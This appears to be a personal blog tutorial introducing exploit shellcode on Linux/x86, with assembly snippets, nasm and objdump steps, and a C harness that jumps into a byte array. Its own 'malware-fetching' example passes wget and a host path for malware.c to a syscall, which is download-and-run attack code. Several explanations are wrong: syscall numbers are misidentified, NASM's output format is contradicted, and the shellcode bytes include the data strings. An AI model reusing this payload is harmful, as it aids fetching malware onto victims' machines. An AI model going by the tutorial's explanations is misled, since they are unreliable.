Overview of Exploit Payload Crafting
[See the original post on my WordPress site]
According to Wikipedia:
'shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability. It is called “shellcode” because it typically starts a command shell from which the attacker can control the compromised machine, but any piece of code that performs a similar task can be called shellcode.’
Perhaps the most straightforward example of this would be a buffer overflow exploit, the shellcode being what's carried into the next buffer for execution. For this to happen, there must be a vulnerability, and an exploit must be created to set things up for the shellcode to execute.
Assembler
Disassembling a random sysinternals binary (as an example) gives an output that, on the surface, looks almost unintelligible to most of us. However, it only looks unintelligible because it lacks context on its own. Let’s create some context by noting two features of the language:
Very limited vocabulary. Assembler code is created with only a handful of commands (add, sub, mov, etc.) each representing a circuit within the microprocessor that performs a specific operation with whatever values are passed to it.
Each memory register (EAX, ECX, etc.) is basically a ‘buffer’ connected physically to something on the microprocessor board, whether it be a memory chip, I/O port, pretty flashing LEDs, etc. etc. It follows that a value passed to a register connected to an I/O port will result in a given output.
Shellcoding for the Linux/x86 Architecture
This principle is best illustrated with shellcode created for a UNIX-based system, as there is a definite set of system calls mapped to specific values in /usr/src/linux/include/asm-i386/unistd.h (for the i386 architecture), and a specific register the values are stored in during runtime (in this case EAX). Meanwhile, the arguments/parameters for a system call are stored in registers EBX ECX, EDX and several others. I haven’t the slightest idea what the equivalent is for a Windows operating system.
With this in mind, it’s now much easier to understand a segment of code I robbed from the InfoSec Institute’s site:
mov eax, 11
mov edx, 0
mov ebx, cmd
push edx
mov ecx,file
push ecx
push ebx
mov ecx,esp
int 80h
It places value ’11’ in register EAX, which refers to the listxattr() function in /asm-i386/unistd.h (or at least it does on my machine). Next, the code places ‘cmd‘ as an argument in EBX and ‘file‘ in ECX. It then uses the ‘push‘ instruction to cause the function to execute with both ‘cmd‘ and ‘file‘ as arguments. The ‘int 80h‘ causes a system interrupt that switches between the kernel and user spaces.
The resulting shellcode does nothing on its own, as it’s not a binary/executable. The latter must be in a specific format (ELF) in order for a UNIX system to execute it, with a data section and a text section. And just to make things more complicated, the values in our shellcode are mapped to other command arguments in the data section, as my own little malware-fetching example shows:
;/bin/cat /etc/getmalware .data
get db '/bin/wget', 0
file db '192.169.0.100/malware.c'
section .text
global _start
_start:
mov eax, 203
mov edx, 0
mov ebx,get
push edx
mov ecx,file
push ecx
push ebx
mov ecx,esp
int 80h
Getting the Payload to Execute
Another problem is we can’t get the shellcode to execute unless it’s already in a buffer with the system’s instruction pointer pointing at it (which should happen after a buffer overflow). What’s needed is a C program that buffers and executes its opcode.
I’ve used the Netwide Assembler (NASM), which generates the object code for Win32 systems, then used objdump (part of the binutils library) to get the opcodes.
To assemble the code:
$ nasm -f elf Malware-Fetch.asm
To dump the object code:
$ objdump -d Malware-Fetch.o
This gives us some opcodes in the second column of the output, which are reformatted and put into a little C container that should look something like:
char shellcode[] = "\x2f\x62\x69\x6e\x2f\x77\x67\x65\x74\x00\x31\x39\x32"
"\x2e\x31\x36\x39\x2e\x30\x2e\x31\x30\x30\x2f\x6d\x61"
"\x6c\x77\x61\x72\x65\x2e\x63\xb8\xcb\x00\x00\x00\xb8"
"\xcb\x00\x00\x00\xba\x00\x00\x00\x00\xbb\x00\x00\x00"
"\x00\x52\xb9\x0a\x00\x00\x00\x51\x53\x89\xe1\xcd\x80"
;
int main()
{
int *ret;
ret = (int *)&ret + 2;
(*ret) = (int)shellcode;
}`